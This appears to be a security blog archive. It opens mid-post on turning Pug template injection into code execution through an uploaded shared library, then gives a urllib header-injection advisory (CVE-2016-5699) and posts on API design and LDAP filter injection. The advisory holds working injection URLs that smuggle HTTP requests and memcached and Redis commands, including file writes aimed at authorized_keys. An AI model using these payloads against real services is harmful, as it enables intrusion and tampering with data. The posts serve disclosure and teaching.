echo "INFO: Now compiling the code as a shared library..."
gcc -c -fPIC /tmp/${NAME}.c -o ${NAME}.o\
  && gcc ${NAME}.o -shared -o lib${NAME}.so

echo "INFO: Cleaning up..."
rm ${NAME}.o /tmp/${NAME}.c

echo "INFO: Final output is lib${NAME}.so in the current directory."

To test it locally, I simply ran this script to create the binary, and ran a bit of Pug code to attempt to load it as a module:

$ ./make-evil-so.sh 
INFO: Temporarily writing a C source file to /tmp/evil.c
INFO: Now compiling the code as a shared library...
INFO: Cleaning up...
INFO: Final output is libevil.so in the current directory.

$ echo "- process.dlopen('evil', './libevil.so')" > test.jade
$ jade test.jade

EVIL LIBRARY LOADED
/usr/local/lib/node_modules/jade/lib/runtime.js:240
  throw err;
  ^

Error: test.jade:1
  > 1| - process.dlopen('evil', './libevil.so')
    2| 

Module did not self-register.
    at Error (native)
    at eval (eval at <anonymous> (/usr/local/lib/node_modules/jade/lib/index.js:218:8), <anonymous>:11:9)
    at eval (eval at <anonymous> (/usr/local/lib/node_modules/jade/lib/index.js:218:8), <anonymous>:13:22)
    at res (/usr/local/lib/node_modules/jade/lib/index.js:219:38)
    at renderFile (/usr/local/lib/node_modules/jade/bin/jade.js:270:40)
    at /usr/local/lib/node_modules/jade/bin/jade.js:136:5
    at Array.forEach (native)
    at Object.<anonymous> (/usr/local/lib/node_modules/jade/bin/jade.js:135:9)
    at Module._compile (module.js:409:26)
    at Object.Module._extensions..js (module.js:416:10)
$ ls -la /tmp/*hack*
-rw-r--r-- 1 tim tim 0 Aug 26 19:23 /tmp/hacked-by-evil-so

As we expect, the library file fails to load as a true Node module, but the library's onload() function clearly ran with code of our choosing. Needless to say, this worked like a charm against the vulnerable app I created for the students.

Summary

Clearly this attack was possible because I set up the vulnerable application to accept file uploads in an unsafe way, which gave students access to both execute Jade/Pug templates and to upload shared libraries to complete the escalation. This may be a fairly uncommon situation in practice. However, there are a few other corner cases where an attacker may be able to leverage a similar sequence of steps leading to code execution. For instance, if a Pug template was vulnerable to an eval() injection during server-side JavaScript execution, then that would give an attacker access to the sandboxed execution context without needing to upload any files. From there, an attacker may be able to do one of the following to break out of the sandbox:

Any objects explicitly exposed to Pug in local variables by the application's developer could be leveraged to perhaps escalate privileges within the application or operating system, depending on the functionality exposed
Pre-installed native modules could be loaded up using dlopen, and any functionality in those could perhaps be used to escalate privileges
Under Windows, it may be possible to use dlopen with UNC paths to fetch a library payload from a remote server (I haven't tested this... would love to hear if others find it is possible!)

Am I forgetting any other possibilities? Probably. Ping me on Twitter if you have any other ideas.

Finally, I just want to make clear that I don't really fault the Pug developers for allowing this to occur. The code execution restrictions they have implemented really should be seen as a best-effort security measure. It is proactive and they should be applauded for it. The restricted namespace will certainly make an attacker's life difficult in many situations, and we can't expect the Pug developers to know about every little undocumented feature in the Node.js API. With that said: Should the Pug folks find a way to block dlopen access? Yes, probably. There's no good reason to expose this to Pug code in the vast majority of applications, and if a developer really wanted it, they could expose it via local variables.

Wednesday, June 15, 2016

Advisory: HTTP Header Injection in Python urllib

Update 1: The MITRE Corporation has assigned CVE-2016-5699 to this issue.
Update 2: Remarkably, Blogger stripped the %00 element from a non-clickable URL when I originally posted this. So I had to "fix" that by obfuscating it. *sigh*

Overview

Python's built-in URL library ("urllib2" in 2.x and "urllib" in 3.x) is vulnerable to protocol stream injection attacks (a.k.a. "smuggling" attacks) via the http scheme. If an attacker could convince a Python application using this library to fetch an arbitrary URL, or fetch a resource from a malicious web server, then these injections could allow for a great deal of access to certain internal services.

The Bug

The HTTP scheme handler accepts percent-encoded values as part of the host component, decodes these, and includes them in the HTTP stream without validation or further encoding. This allows newline injections. Consider the following Python 3 script (named fetch3.py):

#!/usr/bin/env python3

import sys
import urllib
import urllib.error
import urllib.request

url = sys.argv[1]

try:
    info = urllib.request.urlopen(url).info()
    print(info)
except urllib.error.URLError as e:
    print(e)

This script simply accepts a URL in a command line argument and attempts to fetch it. To view the HTTP headers generated by urllib, a simple netcat listener was used:

nc -l -p 12345

In a non-malicious example, we can hit that service by running:

./fetch3.py http://127.0.0.1:12345/foo

This caused the following request headers to appear in the netcat terminal:

GET /foo HTTP/1.1
Accept-Encoding: identity
User-Agent: Python-urllib/3.4
Connection: close
Host: 127.0.0.1:12345

Now we repeat this exercise with a malicious hostname:

./fetch3.py http://127.0.0.1%0d%0aX-injected:%20header%0d%0ax-leftover:%20:12345/foo

The observed HTTP request is:

GET /foo HTTP/1.1
Accept-Encoding: identity
User-Agent: Python-urllib/3.4
Host: 127.0.0.1
X-injected: header
x-leftover: :12345
Connection: close

Here the attacker can fully control a new injected HTTP header.

The attack also works with DNS host names, though a NUL byte must be inserted to satisfy the DNS resolver. For instance, this URL will fail to look up the appropriate hostname:

http://localhost%0d%0ax-bar:%20:12345/foo

But this URL will connect to 127.0.0.1 as expected and allow for the same kind of injection:

http://localhost%00%0d%0ax-bar:%20:12345/foo

Note that this issue is also exploitable during HTTP redirects. If an attacker provides a URL to a malicious HTTP server, that server can redirect urllib to a secondary URL which injects into the protocol stream, making up-front validation of URLs difficult at best.
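
To make the decoding step concrete, here is a minimal Python 3 sketch of a pre-flight check that percent-decodes the authority portion of a URL and looks for control characters. The function name looks_like_injection is hypothetical and not part of urllib. Because of the redirect problem just described, a check like this only sees the first URL, so treat it as an illustration of the bug rather than a fix.

```python
from urllib.parse import unquote, urlsplit


def looks_like_injection(url):
    """Return True if the decoded authority contains control characters."""
    # netloc is everything between "//" and the next "/", still percent-encoded.
    authority = unquote(urlsplit(url).netloc)
    # CR, LF and NUL all fall in the C0 control range (below 0x20).
    return any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in authority)


if __name__ == "__main__":
    for candidate in (
        "http://127.0.0.1:12345/foo",
        "http://127.0.0.1%0d%0aX-injected:%20header%0d%0ax-leftover:%20:12345/foo",
        "http://localhost%00%0d%0ax-bar:%20:12345/foo",
    ):
        print(looks_like_injection(candidate), candidate)
```

The check deliberately inspects the whole authority rather than a parsed host name, since the injected colons make any host/port split unreliable.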

Attack Scenarios

Here we discuss just a few of the scenarios where exploitation of this flaw could be quite serious. This is far from a complete list. While each attack scenario requires a specific set of circumstances, there are a vast variety of different ways in which the flaw could be used, and we don't pretend to be able to predict them all.

HTTP Header Injection and Request Smuggling

The attack scenarios related to injecting extra headers and requests into an HTTP stream have been well documented for some time. Unlike the early request smuggling research, which has a complex variety of attacks, this simple injection would allow the addition of extra HTTP headers and request methods. While the addition of extra HTTP headers seems pretty limited in utility in this context, the ability to submit different HTTP methods and bodies is quite useful. For instance, if an ordinary HTTP request sent by urllib looks like this:

GET /foo HTTP/1.1
Accept-Encoding: identity
User-Agent: Python-urllib/3.4
Host: 127.0.0.1
Connection: close

Then an attacker could inject a whole extra HTTP request into the stream with URLs like:

http://127.0.0.1%0d%0aConnection%3a%20Keep-Alive%0d%0a%0d%0aPOST%20%2fbar%20HTTP%2f1.1%0d%0aHost%3a%20127.0.0.1%0d%0aContent-Length%3a%2031%0d%0a%0d%0a%7b%22new%22%3a%22json%22%2c%22content%22%3a%22here%22%7d%0d%0a:12345/foo

Which produces:

GET /foo HTTP/1.1
Accept-Encoding: identity
User-Agent: Python-urllib/3.4
Host: 127.0.0.1
Connection: Keep-Alive

POST /bar HTTP/1.1
Host: 127.0.0.1
Content-Length: 31

{"new":"json","content":"here"}
:12345
Connection: close

This kind of full request injection was demonstrated to work against Apache HTTPD, though it may not work against web servers that do not support pipelining or are more restrictive on when it can be used. Obviously this kind of attack scenario could be very handy against internal, unauthenticated REST, SOAP, and similar services. (For example, see: Exploiting Server Side Request Forgery on a Node/Express Application (hosted on Amazon EC2).)
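
For readers who want to see how such a URL is assembled, the following is a small sketch that percent-encodes the injected text and places it between the host and the port. The helper name build_test_url is an assumption made for this example, and the payload is the same one shown above. Note that urllib.parse.quote emits uppercase hex digits, so the result differs from the URL above only in letter case.

```python
from urllib.parse import quote, unquote


def build_test_url(host, port, path, injected):
    """Place percent-encoded text between the host and the port of a URL."""
    # safe="" forces ":", "/" and every other reserved character to be encoded.
    return "http://{}{}:{}{}".format(host, quote(injected, safe=""), port, path)


BODY = '{"new":"json","content":"here"}'
INJECTED = (
    "\r\nConnection: Keep-Alive\r\n\r\n"
    "POST /bar HTTP/1.1\r\n"
    "Host: 127.0.0.1\r\n"
    "Content-Length: {}\r\n\r\n".format(len(BODY))
    + BODY + "\r\n"
)

if __name__ == "__main__":
    url = build_test_url("127.0.0.1", 12345, "/foo", INJECTED)
    print(url)
    # Decoding shows the text a vulnerable urllib would place after "Host: ".
    print(unquote(url[len("http://"):].split("/", 1)[0]))
```

Computing Content-Length from the body keeps the injected request self-consistent if the JSON is changed.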

Attacking memcached

As described in the protocol documentation, memcached exposes a very simple network protocol for storing and retrieving cached values. Typically this service is deployed on application servers to speed up certain operations or share data between multiple instances without having to rely on slower database calls. Note that memcached is often not password protected because that is the default configuration. Developers and administrators often operate under the poorly conceived notion that "internal" services of these kinds can't be attacked by outsiders.
In our case, if we could fool an internal Python application into fetching a URL for us, then we could easily access memcached instances. Consider the URL:

http://127.0.0.1%0d%0aset%20foo%200%200%205%0d%0aABCDE%0d%0a:11211/foo

This generates the following HTTP request:

GET /foo HTTP/1.1
Accept-Encoding: identity
Connection: close
User-Agent: Python-urllib/3.4
Host: 127.0.0.1
set foo 0 0 5
ABCDE
:11211

When evaluating the above lines in light of memcached protocol syntax, most of the above produce syntax errors. However, memcached does not close the connection upon receiving bad commands. This allows attackers to inject commands anywhere in the request and have them honored. The above request produced the following response from memcached (which was configured with default settings from the Debian Linux package):

ERROR
ERROR
ERROR
ERROR
ERROR
STORED
ERROR
ERROR

The "foo" value was later confirmed to be stored successfully. In this scenario an attacker would be able to send arbitrary commands to internal memcached instances. If an application depended upon memcached to store any kind of security-critical data structures (such as user session data, HTML content, or other sensitive data), then this could perhaps be leveraged to escalate privileges within the application. It is worth noting that an attacker could also trivially cause a denial of service condition in memcached by storing large amounts of data.
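
The response pattern above is easier to follow with a toy model. The sketch below is not memcached's real parser. It is a deliberately simplified stand-in (the name simulate_memcached and its behavior are assumptions for illustration) that understands only the set command and answers ERROR to every other line, without ever closing the connection.

```python
def simulate_memcached(stream):
    """Toy line parser: understands only 'set <key> <flags> <exptime> <bytes>'."""
    lines = stream.split(b"\r\n")
    if lines and lines[-1] == b"":
        lines.pop()  # drop the empty fragment left after the final CRLF
    store, responses = {}, []
    i = 0
    while i < len(lines):
        parts = lines[i].split()
        i += 1
        is_set = len(parts) == 5 and parts[0] == b"set" and parts[4].isdigit()
        if is_set and i < len(lines) and len(lines[i]) == int(parts[4]):
            store[parts[1]] = lines[i]  # the following line is the data block
            i += 1
            responses.append("STORED")
        else:
            responses.append("ERROR")  # unknown command; keep reading anyway
    return store, responses


# The request as urllib sent it, including the blank line that ends the headers.
REQUEST = (
    b"GET /foo HTTP/1.1\r\n"
    b"Accept-Encoding: identity\r\n"
    b"Connection: close\r\n"
    b"User-Agent: Python-urllib/3.4\r\n"
    b"Host: 127.0.0.1\r\n"
    b"set foo 0 0 5\r\n"
    b"ABCDE\r\n"
    b":11211\r\n"
    b"\r\n"
)

if __name__ == "__main__":
    store, responses = simulate_memcached(REQUEST)
    print("\n".join(responses))
    print(store)
```

In this model the five HTTP header lines each draw an ERROR, the injected set is honored, and the leftover ":11211" line and the terminating blank line account for the last two errors.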

Attacking Redis

Redis is very similar to memcached in several ways, though it also provides backup storage of data, several built-in data types, and the ability to execute Lua scripts. Quite a bit has been published about attacking Redis in the last few years. Since Redis provides a TCP protocol very similar to memcached, and it also allows one to submit many erroneous commands before correct ones, the same attacks work in terms of fiddling with an application's stored data.
In addition, it is possible to store files at arbitrary locations on the filesystem which contain a limited amount of attacker controlled data. For instance, this URL creates a new database file at /tmp/evil:

http://127.0.0.1%0d%0aCONFIG%20SET%20dir%20%2ftmp%0d%0aCONFIG%20SET%20dbfilename%20evil%0d%0aSET%20foo%20bar%0d%0aSAVE%0d%0a:6379/foo

And we can see the contents include a key/value pair set during the attack:

# strings -n 3 /tmp/evil
REDIS0006
foo
bar

In theory, one could use this attack to gain remote code execution on Redis by (over-)writing various files owned by the service user, such as:

 ~redis/.profile
 ~redis/.ssh/authorized_keys
 ...

However, in practice many of these files may not be available, not used by the system or otherwise not practical in attacks.

Versions Affected

All recent versions of Python in the 2.x and 3.x branches were affected. Cedric Buissart helpfully provided information on where the issue was fixed in each:

3.4 / 3.5 : revision 94952

2.7 : revision 94951

While the fix has been available for a while in the latest versions, the lack of follow-through by Python Security means many stable OS distributions likely have not had back patches applied to address it. At least Debian Stable, as of this writing, is still vulnerable.

Responsible Disclosure Log

2016-01-15

Notified Python Security of vulnerability with full details.

2016-01-24

Requested status from Python Security, due to lack of human response.

2016-01-26

Python Security list moderator said original notice held up in moderation queue. Mails now flowing.

2016-02-07

Requested status from Python Security, since no response to vulnerability had been received.

2016-02-08

Response from Python Security. Stated that issue is related to a general header injection bug, which has been fixed in recent versions. Belief that part of the problem lies in glibc; working with RedHat security on that.

2016-02-08

Asked if Python Security had requested a CVE.

2016-02-12

Python Security stated no CVE had been requested, will request one when other issues sorted out. Provided more information on glibc interactions.

2016-02-12

Responded in agreement that one aspect of the issue could be glibc's problem.

2016-03-15

Requested a status update from Python Security.

2016-03-25

Requested a status update from Python Security. Warned that typical disclosure policy has a 90 day limit.

2016-06-14

RedHat requested a CVE for the general header injection issue. Notified Python Security that full details of issue would be published due to inaction on their part.

2016-06-15

Full disclosure.

Final Thoughts

I find it irresponsible of the developers and distributors of Redis and memcached to provide default configurations that lack any authentication. Yes, I understand the reasoning that they should be used only on "trusted internal networks". The problem is that very few internal networks, in practice, are much safer than the internet. We can't continue to make the same bad assumptions of a decade ago and expect security to improve. Even an unauthenticated service listening on localhost is risky these days. It wouldn't be hard to add an auto-generated, random password to these services during installation. That is, if the developers of these services took security seriously.

Friday, November 20, 2015

Security Warnings in API Docs are not Enough

May 25, 1979: American Airlines flight 191 started down the runway at Chicago O'Hare Airport. Just before takeoff, the left engine tore itself completely off of the wing. This severed four critical hydraulic lines as well as disabling several safety systems. 20 seconds after takeoff, the lack of hydraulic pressure caused the left wing control surfaces to stop responding and the plane began to bank steeply to the left. 31 seconds after takeoff, the plane was a fireball on the ground, killing 273 people. This remains the most deadly air accident in US history and is very well documented. While the airline industry has certainly learned a lot from this tragedy, I believe there are lessons that we, as software developers, can take from it as well.

What Happened?

Before we can draw any wisdom from this tragedy, we must understand the dramatic mechanical failure that caused the engine to free itself from the wing. The McDonnell Douglas DC-10 wing engines are attached to a large arm called the "pylon", which is then attached to the wing.

For various maintenance reasons, mechanics need to detach the engine and pylon from the wing. The procedure for doing this, as provided by McDonnell Douglas, calls for the removal of the engine first, followed by the removal of the pylon. However, this process is very time consuming, especially if you don't have a specific reason to detach the engine from the pylon. That's why several carriers, including American Airlines, independently developed procedures for detaching the pylon from the wing while the engine was still attached. AA's procedure involved using a fork lift to hold the engine and assembly while the pylon/wing bolts were removed and re-installed. McDonnell Douglas did not approve this procedure, and may have cautioned against it, but they could not dictate to any airline what procedures were used.

As it turns out, it is very difficult to manipulate a heavy engine and pylon assembly using a fork lift with the precision required to avoid damaging the aircraft. In the case of the AA flight 191 aircraft, the rear pylon attachment point had been pressed up against the wing too hard, which created a fracture in the pylon's rear bracket. Over the next couple of months, this fracture widened with each take off and landing. When it finally failed, the engine's thrust pulled the entire assembly forward, rotating up and over the front edge of the wing. The engine/pylon took a chunk of the wing with it and cut the wing's hydraulic lines in the process. Inspection of other DC-10 planes after the crash revealed that similar damage had resulted from similar short-cut procedures used by both American and Continental Airlines.

Clearly, the majority of responsibility for the flight 191 accident lies with the airline maintenance staff, since they didn't follow the recommended procedure. The aircraft engineers at McDonnell Douglas may very well have anticipated the potential problems with trying to detach the pylon from the wing with the engine still attached, which is why they provided a safer procedure in the manual. But for McDonnell Douglas, this was little comfort when all DC-10's in the US were grounded for 37 days. This caused huge problems for the company in a competitive aircraft market. It was little comfort to the victims and those affected by the crash. Everyone loses in these situations, even those who are "right" about a seemingly arcane technical issue.

Lessons about People and Process

If software security is about People, Process and Technology, as espoused by Schneier, then these kinds of issues seem to fall squarely in the People and Process categories. Especially when technical pitfalls are documented, it is easy for engineers that are knowledgeable in a particular area to develop ivory tower syndrome and take the stance: "I told you not to do it that way, but if you want to shoot yourself in the foot, by all means..." But if our goal is to provide end-to-end safety or security, then this mentality isn't acceptable. As it turns out, there are things engineers can do, besides just documenting risks, to avoid People and Process problems with Technology. This is certainly not always the case: some problems simply cannot be addressed with Technology alone. But many can be mitigated if those problems can be anticipated to begin with.

Typically in software, the downsides of failure are not nearly as serious. However, the kind of displaced fallout that McDonnell Douglas experienced also shows up in software security. One example would be with open source blog software packages, such as WordPress. In a number of discussions I've had with clients and security folk, the topic of WordPress security has come up. Everything I hear indicates that WordPress has a pretty poor reputation in this area. In one way, this seems a little odd to me, since I have briefly looked at the core WordPress code base a few times and they do a lot of things right. Sure, WordPress has its share of security issues, don't get me wrong, but the core software isn't that terrible. However, if you do a CVE search for WordPress, the number of vulnerabilities associated with WordPress plugins is quite depressing. To me, it is apparent that bad plugin security has hurt WordPress' reputation around security in general, despite the majority of vulnerabilities lying somewhat out of the core developers' control.

There are two primary ways that engineers can help guide their technical customers (whether they be other programmers or maintenance crews) down a safe path: discourage dangerous usage and make safe usage much easier than the alternatives.

Discouraging Dangerous Usage

Let us return to the issue of mechanics trying to remove the engine and pylon assembly all in one piece. If the McDonnell Douglas engineers anticipated that this would be unsafe, then they could have made small changes to the engine/pylon assembly such that when the engine is attached, some of the mounting bolts between the pylon and wing were covered up. In this way, it becomes technically infeasible (short of getting out a hack saw) to carry on with the procedure that the airlines devised.

In the case of WordPress, if the core developers realized that many plugin authors keep making mistakes using, say, an unsafe PHP function (there are soooo many to choose from...), then perhaps they could find a way to deploy a default PHP configuration that disables the unsafe functions by default (using the disable_functions option or equivalent). Sure, developers could override this, but it would give many developers pause as to why they have to take that extra step (and then perhaps more of them would actually RTFM).

Making Safe Usage Easier

Of course, disabling features or otherwise making life difficult for your customers is not the best way to make yourself popular. A better way to encourage safety by developers (or mechanics) would be to devise faster/better solutions to their problems that are also safe. In the case of the airline mechanics, once McDonnell Douglas realized that three airlines were using a short-cut procedure, then they could have evaluated the risks of this and devised another procedure that was both fast and safe. For instance, if they had tested United's method of using a hoist (rather than a fork lift), they may have realized that a hoist is perfectly fine and encouraged the other two airlines to use that method instead. Or perhaps they could have provided a special protective guide, harness, or special jacks that would allow for fine control over the engine/pylon assembly when manipulating it.

In the case of WordPress, instead of just disabling dangerous interfaces in PHP, they could also provide alternative interfaces that are much less likely to be misused. For example: database access APIs that don't require developers to write SQL statements by hand, or file access primitives that make directory traversal impossible within a certain sub-tree. Of course it depends on the kinds of mistakes that developers keep making, but by adding APIs that are both safe by default and that save developers time, more and more of the developer population will gravitate toward safe usage.
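
As a rough idea of what such a file access primitive could look like, here is a minimal sketch. It is written in Python rather than PHP purely for illustration, and the name resolve_within is hypothetical. It resolves a user-supplied path against a base directory and refuses anything that lands outside that sub-tree.

```python
import os


def resolve_within(base_dir, user_path):
    """Resolve user_path under base_dir, refusing anything outside it."""
    base = os.path.realpath(base_dir)
    # realpath collapses ".." segments and follows symlinks before the check.
    candidate = os.path.realpath(os.path.join(base, user_path))
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError("path escapes the allowed sub-tree")
    return candidate


if __name__ == "__main__":
    print(resolve_within("/srv/uploads", "avatars/tim.png"))
    try:
        resolve_within("/srv/uploads", "../../etc/passwd")
    except ValueError as err:
        print("rejected:", err)
```

A developer who only ever opens files through a helper like this never has to think about traversal sequences, which is the point: the safe path is also the convenient one.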

Conclusion

Once again, it is easy to pass the buck on these kinds of problems and assume, as an API designer, that your users' poor choices are out of your control. It is also easy to assume that your users are just as technically savvy as yourself and won't make mistakes that seem obvious to you. But these are both bad assumptions and should be constantly questioned when it comes to ensuring the security of the overall system.

Tuesday, January 6, 2015

Multiple LDAP APIs are Asking for Trouble

LDAP filter injection is a classic injection flaw that occurs when user-supplied values find their way into LDAP search filters ("queries") without proper encoding or input validation. The issue has been publicly described since at least 2002 [1] and I still find these flaws on a fairly regular basis. For those unfamiliar with it, these vulnerabilities most often show up in application login forms and can allow an attacker to extract the usernames that exist in the directory and often allow the extraction of attribute values from user objects. In older LDAP servers (or poorly configured ones), it is sometimes possible to extract user password hashes, since these are just an attribute on user objects. LDAP filter injection typically isn't as severe as SQL injection, but it can be serious, depending on how the application uses the filter and what sensitive attributes exist on objects.

Recently, I was describing to a client how to correct a filter injection in their code based on the LDAP API they were using and I was struck by how poorly constructed the API was. In this case, it was the "cfldap" tag provided by Adobe ColdFusion [2][3]. Throughout the documentation, I see no mention anywhere about the dangers of dynamically constructing search filters. In addition, there's apparently no function provided to escape special characters in user-supplied strings for use in filters or DN syntax. Of course any developer could read the fairly straight-forward RFC on the topic [4] and write an encoding function themselves to convert things like "(" to "\28". But as I mentioned in my previous post, one can't really expect developers to be experts in external technologies like LDAP, directory servers, and filter syntax. To add insult to injury, the documentation even provides code examples which are vulnerable to filter injection:

...
<form action="cfldap.cfm" method="POST"> 
    <input type="text" name="name"><br><br> 
    <input type="submit" value="Search"> 
</form> 
<!--- make the LDAP query ---> 
<!-- Note that some search text is required. 
    A search filter of cn=** would cause an error --> 
<cfif (isdefined("form.name") AND (form.name IS NOT ""))> 
    <cfldap 
        server="ldap.airius.com" 
        action="query" 
        name="results" 
        start="ou=People, o=Airius.com" 
        scope="onelevel" 
        filter="(&(cn=*#form.Name#*)(l=Santa Clara))" 
        attributes="cn,sn,ou,mail,telephonenumber" 
        sort="ou,sn" 
        maxrows=100 
        timeout=20000 
    > 
...

There you go, taking a value straight from the form submission and inserting it into a query. How can you expect the typical ColdFusion developer to protect their code from this kind of vulnerability when the API and documentation are effectively setting them up for failure? As one can imagine, ColdFusion isn't alone in this kind of API negligence:

PHP's LDAP API does provide an escaping function [5], but it isn't mentioned at all on the ldap_search page, and this page even provides a code example that is almost as vulnerable as ColdFusion's [6].
Under Java, the Apache Directory LDAP API does not appear to offer any escaping function and also doesn't mention anything about the risks of dynamically constructed filter expressions [7].
For .NET, I have yet to find a method that allows one to escape values prior to including them in search filters (outside of some provided in older C++ APIs). The DirectorySearcher class doesn't seem to contain any mention of the security risks of dynamic filter expressions [8]. Other MSDN pages [9][10] do discuss the escape syntax, but I haven't yet found any security warnings associated with it.

Ok, so if these API vendors aren't doing enough to dissuade developers from making search filter mistakes, what would things look like if they were doing it "right"? Well, we can start by taking inspiration from modern SQL query APIs. The data flow and syntax concerns are very similar, but a lot more attention has been paid to constructing SQL queries safely. The best solutions we have come up with include:

Query template APIs, A.K.A. "parameterized prepared statements". Here, programmers are expected to provide a query template along with a series of (potentially untrusted) dynamic values, each mapped to a particular element within the template. Encoding is automatically performed based on data type (or is unnecessary if the database server supports parsing the query templates).
Object-Relational Mapping (ORM) or more abstract APIs. Here, an abstract object representation is provided to developers which effectively eliminates the need to construct queries in most situations.
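As a rough illustration of the query template approach, the sketch below uses Python's standard sqlite3 module with an in-memory database. The table, column names, and sample rows are invented for the example. The point is only that the untrusted value is bound to a `?` placeholder rather than concatenated into the SQL text.

```python
import sqlite3

# In-memory database with made-up sample data, purely for demonstration.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE people (cn TEXT, city TEXT)")
conn.executemany(
    "INSERT INTO people (cn, city) VALUES (?, ?)",
    [("Alice Smith", "Santa Clara"), ("Bob Jones", "Sunnyvale")],
)


def find_people(conn: sqlite3.Connection, name_fragment: str) -> list:
    """Look up people by name fragment using a parameterized query."""
    # The query text is a fixed template; the driver binds the values, so the
    # user's input is never parsed as SQL. (LIKE wildcards inside the value
    # still act as wildcards, which is a separate concern from injection.)
    query = "SELECT cn FROM people WHERE cn LIKE ? AND city = ? ORDER BY cn"
    params = (f"%{name_fragment}%", "Santa Clara")
    return [row[0] for row in conn.execute(query, params)]


print(find_people(conn, "Smith"))        # ['Alice Smith']
print(find_people(conn, "' OR '1'='1"))  # []
```

The classic injection string in the second call is treated as an odd-looking name and simply matches nothing.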

Indeed, these approaches have worked wonders for the safety of relational database access. Over the last several years I have noticed the frequency of SQL injection flaws drop dramatically for newer applications, since most are now leveraging APIs that use one of these approaches. So why don't we do the same for LDAP filter expressions? At a bare minimum, each API should have a string escaping function available, along with documentation of the risks of injection. However, I'm not convinced that providing only an escaping mechanism is sufficient, as this approach hasn't been enough to protect SQL queries in the past.
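A minimal sketch of what such an interface could look like, written in plain Python with no LDAP library involved. The escaping follows the rule in RFC 4515 that the NUL, `(`, `)`, `*`, and `\` characters in an assertion value are written as a backslash followed by two hex digits. The names `escape_filter_value` and `render_filter` are hypothetical, as is the choice of `%s` as the placeholder syntax.

```python
# Characters that RFC 4515 requires to be escaped inside assertion values.
_FILTER_ESCAPES = {
    "\\": r"\5c",
    "*": r"\2a",
    "(": r"\28",
    ")": r"\29",
    "\x00": r"\00",
}


def escape_filter_value(value: str) -> str:
    """Escape one untrusted value for use inside an LDAP search filter."""
    # Each character is mapped independently, so nothing is escaped twice.
    return "".join(_FILTER_ESCAPES.get(ch, ch) for ch in value)


def render_filter(template: str, *values: str) -> str:
    """Fill each %s in the template with an escaped value.

    The template is developer-controlled text; a literal percent sign in it
    would need to be written as %%.
    """
    return template % tuple(escape_filter_value(v) for v in values)


print(render_filter("(&(cn=*%s*)(l=Santa Clara))", "a)(ou=Payroll)(cn=b"))
# (&(cn=*a\29\28ou=Payroll\29\28cn=b*)(l=Santa Clara))
```

With the template form, the developer never has to remember to call the escaping function: the only way to get a value into the filter is through a placeholder, which is the same design idea that parameterized SQL relies on.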

For those keeping score, here's a summary of the limited set of LDAP APIs I've looked at so far and how well they fare in providing safe interfaces and documentation:

API	Unsafe Examples	Security Risks Documented	Encoding Function	Filter Templates	ORM-like API
ColdFusion 10	YES	NO	NO	NO	NO
PHP 5	YES	NO	YES	NO	NO
Apache	NO	NO	NO	NO	NO
.NET	NO	NO	NO	NO	NO
python-ldap	NO	YES	YES	YES	NO
Perl Net::LDAP	NO	YES	NO	NO	NO

There's a lot of documentation to cover here, so it's certainly possible I missed something in one or more of these. If I misrepresented anything, post a comment below and I'll happily fix it.

References

[1] LDAP Injection: Are your web applications vulnerable? -- Sacha Faust, SPI Dynamics Inc.
http://www.networkdls.com/articles/ldapinjection.pdf
[2] ColdFusion Documentation Wiki: cfldap
https://wikidocs.adobe.com/wiki/display/coldfusionen/cfldap
[3] Adobe ColdFusion 10 - Querying an LDAP directory
http://help.adobe.com/en_US/ColdFusion/10.0/Developing/WSc3ff6d0ea77859461172e0811cbec0eb56-7fe5.html
[4] RFC 4515: LDAP String Representation of Search Filters
https://tools.ietf.org/search/rfc4515
[5] PHP: ldap_escape
http://php.net/manual/en/function.ldap-escape.php
[6] PHP: ldap_search
http://php.net/manual/en/function.ldap-search.php
[7] Apache Directory API: Searching (...)
http://directory.apache.org/api/user-guide/2.3-searching.html
[8] MSDN: DirectorySearcher.Filter Property
http://msdn.microsoft.com/en-us/library/system.directoryservices.directorysearcher.filter(v=vs.110).aspx
[9] MSDN: Search Filter Syntax
http://msdn.microsoft.com/en-us/library/aa746475%28v=vs.85%29.aspx
[10] MSDN: Creating a Query Filter
http://msdn.microsoft.com/en-us/library/ms675768%28v=vs.85%29.aspx

Monday, December 22, 2014

Why the Security Community Should Focus More on API Design

Every year, billions of lines of software code are written and deployed into production. While software security experts frantically review code and conduct penetration tests on some of these applications, a vanishingly small percentage ever undergo serious (or regular) security reviews. Unless something major changes in the current regulatory environment, this trend will continue indefinitely, as there are far more developers than security analysts in the market.

It is pretty obvious that simply playing whack-a-mole with individual vulnerabilities is not an efficient way for security experts and developers to spend their time. Perhaps, if developers understood more about security and the kinds of technical flaws that commonly rear their ugly heads, then many issues could be avoided up front. This has been a major goal of organizations like OWASP, which has been trying for over a decade to educate developers on the kinds of software vulnerabilities that are most common in a given situation and how they can best be addressed.

In my experience, developer education does work when it is well executed. In cases where I have been heavily involved in a software development team, working with them to both test their applications and also hold training sessions on the kinds of things they should watch out for, I've found that the quality of code improves a great deal. It's rarely the case that every developer on a given team takes a strong interest in security, or that the content really "clicks" with every developer. But if just one or two core developers on a team of 5-10 take it seriously, then the problems sort of clean themselves up during the development cycle. Safer frameworks are developed, APIs are changed, and the basic development "norms" improve to where many categories of flaws become rare.

Developer education: Good, but not as effective as we would like

After a decade of working in software security, I'm convinced that the situation isn't getting better, despite many developer education efforts. Each year, we have more and more CVEs to go with more and more software products. Sometimes, entire classes of vulnerabilities become uncommon, but are only replaced by new kinds of issues to go along with the latest technology fad.

So if developer education is effective, why isn't it improving our situation? Are we simply not providing enough education? It may be true that employers are hesitant to provide extensive security education in a job market where this may train their employees for their next job. But for those that don't receive formal training, do developers learn nothing from the rare security review their applications are subjected to? No. I am optimistic, in that I think most developers do care about their code and how they deliver their end product. The majority of serious software flaws are trivial to fix. I would guess that perhaps 80% consist of a 1 to 5 line code change. And once a certain type of issue is understood, developers typically change their libraries to make it easy to avoid the problem in the future. So what's going on here? I suspect it is a combination of factors, but let us look at one area that I don't think has been discussed at length before...

